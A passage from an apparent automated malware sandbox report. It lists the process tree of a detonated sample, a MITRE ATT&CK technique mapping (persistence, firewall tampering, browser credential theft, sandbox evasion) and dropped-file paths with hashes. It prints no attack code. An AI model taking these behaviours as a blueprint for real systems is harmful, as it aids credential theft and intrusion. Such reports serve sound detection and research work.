zgzNDI3NjIxMTgwMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNjEyNDQwMTExIi8-PC9hcHA-PC9yZXF1ZXN0Pg
1⤵
- System Location Discovery: System Language Discovery
PID:5396

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "396" "1144" "1176" "1272" "0" "0" "0" "0" "0" "0" "0" "0"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:3932

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEVCQjdBMUItNTY2Mi00NDQwLUEyNUUtQzVDOTUzQTU3NENGfSIgdXNlcmlkPSJ7RDhENDk0QjctMkE5NS00QjI2LTk2OTEtNjY4QzkwNTAzQUVGfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins4NzEyNEQxQi1BNTJBLTQ1MTAtQTBERi00RjA5NjY3RTc0OER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NDU0OSI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwNjMzMzc5NjQwIi8-PC9hcHA-PC9yZXF1ZXN0Pg
1⤵
- System Location Discovery: System Language Discovery
PID:5588

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4848 -ip 4848
1⤵
PID:5700

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEVCQjdBMUItNTY2Mi00NDQwLUEyNUUtQzVDOTUzQTU3NENGfSIgdXNlcmlkPSJ7RDhENDk0QjctMkE5NS00QjI2LTk2OTEtNjY4QzkwNTAzQUVGfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntDMzJDQkEyOS04RjIwLTQzNTktOUVCRi1BNjJGNTcwMTg5RTV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC40OCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9IntENTQ1NTQwOC0yQTMxLTQ4NjgtODE1My0zQjRDRDBDMzcxMDZ9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuMzMiIG9vYmVfaW5zdGFsbF90aW1lPSIxODQ0Njc0NDA3MzcwOTU1MTYwNiIgdXBkYXRlX2NvdW50PSIxIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM0MzIxNTY1MTMxNDYwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMiIgcj0iMiIgYWQ9IjY2MTIiIHJkPSI2NjEyIiBwaW5nX2ZyZXNobmVzcz0iezZDQzI2QUE4LUU3OUQtNDAyQS1BOERELTM4OUVBRDM5NEIxNX0iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTMyLjAuMjk1Ny4xNDAiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBjb2hvcnQ9InJyZkAwLjI4IiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7NDYxMTFDMUMtMDc4Mi00NkI2LUJEQkItQkU2OUVCRTk0MjI4fSIvPjwvYXBwPjwvcmVxdWVzdD4
1⤵
- System Location Discovery: System Language Discovery
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 7836 -ip 7836
1⤵
PID:7332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 7536 -ip 7536
1⤵
PID:7044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7288 -ip 7288
1⤵
PID:2188

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:5324

C:\Users\Public\Discord.exe
C:\Users\Public\Discord.exe
1⤵
PID:7140

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5756

C:\Windows\System32\pcaui.exe
C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
1⤵
PID:6536

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:8176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2628 -ip 2628
1⤵
PID:7136

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 436 -ip 436
1⤵
PID:4284

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\elevation_service.exe"
1⤵
PID:5152

C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
1⤵
PID:5356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\IMG001.exe:P

Filesize
6B

MD5
9fc3796ee0d2bb42d79fe1b5ce106122

SHA1
d15d023df3c9ee8d1306488308f20bb571e5b89c

SHA256
41fdbb429f5f3a0c95ab831c845b5102a7d64762d6b4b8aebea8ff764183ddd4

SHA512
34fee1699f6be54eb867bd8f208c9b003ec57754236caf8d355e5be508d3e2003606c2b29ca60760b97848fda499bb13ae8656901365bfad2dcacf367c009c21

Download Submit
C:\IMG001.exe:P

Filesize
20B

MD5
57d6a48d6c9662ac864de0d1dd72b817

SHA1
21ed38c2db149a74c62471742ea86713cde6f964

SHA256
27887f9d869d9ea998f4dc50879da686e824c73c39c7b65930da9df2111aa7fd

SHA512
7e35f5665a6b3eaf626c51bd70d5eb9032c2e86be1a4e382575c72035cb0877fe05bc793c5510309b877e46c9c16191db39085f4eac7de2cbf4d15bab006d2f6

Download Submit
C:\ProgramData\4o8qq\37gd2d

Filesize
114KB

MD5
8f9902833123bb13efae06a133851155

SHA1
8094691061edc9222f68946819b802dc71119cfc

SHA256
6f46daa848e2e09eda6a34b22752342454c40e572bf12186c72180a975dcc593

SHA512
990bd5b55936a543271060a22dcaf4f0d50589075fbad68401b0d9c0bc7cd16b619f907872ccd3a8d86309d6db217cd7e8befd925feaff92f1294dbee03c6de5

Download Submit
C:\ProgramData\4o8qq\hvsri5p8g

Filesize
56KB

MD5
0e2c60740cafa19c5158f4aa41a5d4e7

SHA1
f01d0f359e407fed424c30919ed64b77508b3024

SHA256
ce41f2a3255df2099ae8eea9364bd28c6fd6a56c8ca3290bd274944d16d9e6bf

SHA512
e367b88f1d984f84b9b4a8fa4002ede1afad0d375f9374636250f17e64445a60d1b99fe23a0b314c4b2bd5fd27fe5b87fa4079a84b4497629f238afd8436afe2

Download Submit
C:\ProgramData\4o8qq\yusjm7yus

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\ProgramData\4o8qq\zua1n7

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\90z5x\0z58g4

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\ProgramData\90z5x\2djekn

Filesize
224KB

MD5
beb4f2c8780f9c97ccf6c46b8482b726

SHA1
03e10c74dfece7f4511e8f72f246b7c2c63e31be

SHA256
f34b319f4de36bf2a5b57ab2922372d7ca3c86f80d80a619f8eae32b0f573bbe

SHA512
5541c25ec3d79a0c26dd18f93277261da0df61e25dba0bebdd474a897bca7dbee0dcc09ea30ded027d96324c1f23390b5096cf76782a5b188b2b33b3e5297631

Download Submit
C:\ProgramData\90z5x\58gd2v

Filesize
512KB

MD5
59071590099d21dd439896592338bf95

SHA1
6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c

SHA256
07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541

SHA512
eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

Download Submit
C:\ProgramData\90z5x\dba1db

Filesize
288KB

MD5
b2b954adafb30cf01824aaed5ea889de

SHA1
8f6b678c713d554ea808e98be93c25115de79a13

SHA256
1c45476323680730b68b3aabf7126c348b0bd793d7b2aab7cc52ceb95f94433f

SHA512
808e3f83a3b7d20c508aed2e96c8f5f1c9d22296c11f2565460471c5d9065d40c9d0e92187ef36134389f0e77cfb0d9ec6e6b578c9fd6ad62972727e83456629

Download Submit
C:\ProgramData\90z5x\kfuaiw

Filesize
64KB

MD5
3c4a93a45a825b121c812b0406e96656

SHA1
0a0db5af30716c92b3a3051a30bd88f50e903606

SHA256
485573d91b853886b852a22cdeb87bda01b460b1bc4877011dc92b6ab860ce89

SHA512
0501d59586bb91e258c6af813164478755d5a14a9865ba8161d32ed69ea24d33f448a30f3d7969267d8cc953fc16aa22d2cca81b879b9c3b88ff303045e7ac87

Download Submit
C:\ProgramData\90z5x\riwtjm

Filesize
64KB

MD5
c7bf22c8b526f0e4676e740efa183991

SHA1
7c00d274a6b43a5ab8de835318ad40a8275ec342

SHA256
2d64f8a6ffc3adeba533c26811f0d3457071d383ea7e8ed55159f1fdf00cbc81

SHA512
81525a5fc6bc6a816910cb1c359aba45066826ff96c26a57e7ccd50ddf03c9c178428c0cc17aec35f71126d1b431ba1484e03d3fb7f71f0793f1a04ecad4b7e6

Download Submit
C:\ProgramData\90z5x\s0zmyu

Filesize
10KB

MD5
de500c43c1dd10e4e39c72f9c3b952b5

SHA1
c29f5873e277092561abaf7979f3c4c34d53f8c8

SHA256
e4947e0f1866c3722f008dfe4a1c0ee3119a568604def0d5c92df8d0e4fbda9d

SHA512
3eda3953f24d0983e7b92310e479a56792c09d53dfdc738e6f12da01d4dff5bc67c50f7f10d3b8bf643b76977680e0b4db093e796b7a87bac9beb9acb33bbd8b

Download Submit
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

Filesize
380KB

MD5
cd5b37cb759d942ce36feb003df9ca60

SHA1
05db21843adb43b31f0ec82db39f278657bebb39

SHA256
9e20c041b4f294f254ecb7db469372de9b22a4f69662b307e8d188b7f15b1e60

SHA512
f80532f21e09a1c31e23176ae1a053c00137f7e52c77b8ae9f8f8b238c58e85971ebe93e4131dc880de81c3bd8733078cd1d1e30c3d3f999113676fc01ecfd49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
138bbc7a752ee3a4d7a6197c54615473

SHA1
d16eb2ce0b03e22bab35df990109ec498cb65cff

SHA256
dc8656bc2fa53a48b45daf3b20a69925a7ac3e003f2c2c57cc2422a4e1d19304

SHA512
2b6204cfacdc3192d9b25ea102fb315c5d816e299672eab373282d62444a0fd72171f665c9af42da99a8e7e15d408588930abadd13c72dfa1daff6cf2cc7d539

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\c06cf8c9-048d-46ce-8f1d-b501b332536f.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Update.exe.log

Filesize
411B

MD5
3dc9dbdea7b64d1aa174f0b7d9bf82af

SHA1
41f5ed46b506cabe02a1ed03ad4f958b3d577a22

SHA256
354df334b9a390263e437b524f42d1c4bf22ce0b7a2e8757f852742702d970b4

SHA512
edf8682d01a03ac6bc9aaa4dafcc304fbcfd313de0974df33105c5a917e792c4a3927a98c9a1d34e97c3212d90ce933e0b7a20f27c94b5093688543be400d9e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Steam.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
74914cd77249162c94308556b8f2a050

SHA1
aa04c2fe9da47f58fd2e74235984a28483d0d5f7

SHA256
6afd0dbc474097d15bd73044b34778ef291cd0916347fd2c22ff28dceed7162c

SHA512
3bd7247d880bab311b1a99f3fbd2342f47b53f2173a78e1493750834e2502442f2024572e1091cf1436083511d893cb572ea67fa831a26f9f3ced59262d7e0b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
918c6217e18a47305d2b08690986f390

SHA1
45b1fd8bd3059226e2edd79321d5cab8dddcf1fb

SHA256
ca0400e12c00d9a6041e9faff404cdb2692697d8cf185f20fa6cde489cdbab8b

SHA512
f52d61310f82c14d1af8bf8dbfcbb93ac39d0c446323b5dc045d015b5b1370aada7bdca0cdca0e61f86b53d17a6990fedbc71bef4536678c8f3568fee509912e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
e6e42eeec98427afd20f0e81126a28d3

SHA1
418c4c70f797092e5e0f68d85f833a9b28866412

SHA256
013d4d324b3925edb0f83e4f219db95eb0812384267122680dd0ea110c0f86fb

SHA512
5b44a198165635d30841858497f6b96393f0e2e57baf439dbe768c7260ec5a62fc7bc90e27f1fd8bfd46943c5495832c62c0f56b8591d2aa1c0807fc05deca42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
46dfd906dd33f1700864b6e9ddff0865

SHA1
abefe471a0c25c7bb770c9a751ac54ed394b2549

SHA256
1f2ca97ff00f085725e2c33b0d72f329b0337f74663a57639e2d240f58f26353

SHA512
bdde22785b9dd1969114ae3fbc3bcfa3ccdf41196062631538104b9e912a66d01a0ce7e2ca2eb67c33f8a109b4c16e867a5331deeeb0caeb86cf4d8899aed4f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
43KB

MD5
8078f84cdb802dc23e35add063f77ba4

SHA1
10b76618c583f5a4cf203c39d8955bb66f0509d4

SHA256
6aa4abfd04f319ba5db8e5131a91be3c2be73f1c46dd5a8b1a3b747238725bce

SHA512
a6435f03af6ccbc40431020ab286937334d80956f2eb6b62d134c18c8b5bb4d9733a1db0943aab46dd417704fbbc076f73d9dc9fd635e3fbdd17014055a1e499

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
408641808e457ab6e23d62e59b767753

SHA1
4205cfa0dfdfee6be08e8c0041d951dcec1d3946

SHA256
3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

SHA512
e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f8c40f7624e23fa92ae2f41e34cfca77

SHA1
20e742cfe2759ac2adbc16db736a9e143ca7b677

SHA256
c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

SHA512
f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d4c37e59df25e5092d5b97e72f4ecd42

SHA1
7fa1a739078ce0f36995eac06b388cb7a45c4bef

SHA256
ae78274cc5d038b635e734436e79f18019dba45bc9a1cc4e511c1f078c583333

SHA512
d3a5f05195a86f553357eb4f75ae6ec91f47b266a1a4f002458f56cb66d327003f4b99d2d393f7f9dd4cc7e7488421fc0ff5550ff061e8d4bf0e63f0ab296738

Download Submit
C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\olddataeraser19.exe

Filesize
6.5MB

MD5
c9f7a42f057299f92d58d027751ab2ed

SHA1
85662e56b8649223d25fde3fe70de2cbe4ec503d

SHA256
a9ec7ff4a779c7acd1284f6d1e8698a74ece2d9a3e70a7226b69ebd817f6eb32

SHA512
fd6496006fef94496dc1b2f610da838c8187215bb4beb249054f93ef1da69dd6ce4384d5f633e2a14d6057458348fda373e5f0492cba7a4b522047d7d12a0c13

Download Submit
C:\Users\Admin\AppData\Local\Old Data Eraser 5.14.7.1119\sqlite3.dll

Filesize
630KB

MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CA97.tmp.exe

Filesize
5.6MB

MD5
3be03cdd010b7897fabaa0484b0cf332

SHA1
767bc436f4174bc9cf09cdd737195c405a044776

SHA256
57a25c67a9e7e376669e63979fc881cf334ff2410ac688dc4e48def5131b1080

SHA512
ca519343a510b12134fb0035c2d03aaa4253f58ddbb6c71304231a0e600db85369be43c382cddcaf2f66c4e9c3ce994377e6435899b81aa16b6fd72bc5faaf28

Download Submit
C:\Users\Admin\AppData\Local\Temp\History

Filesize
192KB

MD5
4c13812e7092a3ddb7f92a9a51bb7056

SHA1
628bf5a01312a84f7191fe8977496814f2d1b32c

SHA256
198f4c9380c96c776e8e1758da18397ac65630985789279ab98953a3f30acfb9

SHA512
b53aa7152cb0f70c904db47aae8b31b73fed5101345d4159515862c9292a2bf577a8c5d2ca77291d28a06623aab2b8d9ac95625ba588e90f4547511fb77da614

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe

Filesize
282KB

MD5
da401fe564d861a209ff600633e4a845

SHA1
a03a9d038f464984717322ff18996d8024242b51

SHA256
e317fe7d8d54c2935cb43168e3a65954c180f2c82d97fee05ada76d87af0c52c

SHA512
eec4766c17df4d484d8ea59de9794669c887962aa20e0791a751954677cc3736abbf31673087f70d00dae98770f26ce18d6c9f5d579ccf160a9c262ef0767bfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0hcitrdj.gg3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe

Filesize
234KB

MD5
417d5e5a8adc0d942549198dfa5c8b96

SHA1
76beed040d8855e011a179a21a85630b3de697dd

SHA256
2970d89bd027eebbdd2ef39718c66b4e275e2d99a691230eeea515f603b8e268

SHA512
2b985ddb69ba84fd2a905baa645cbe9279768d63e2071406957513b198175beb3bffd9960f90cfcfcd478b6927fcba9e56fcc946ea065db1721cef8117dece01

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Bjkm5hE.exe

Filesize
1.7MB

MD5
0f2e0a4daa819b94536f513d8bb3bfe2

SHA1
4f73cec6761d425000a5586a7325378148d67861

SHA256
8afc16be658f69754cc0654864ffed46c97a7558db0c39e0f2d5b870c1ff6e39

SHA512
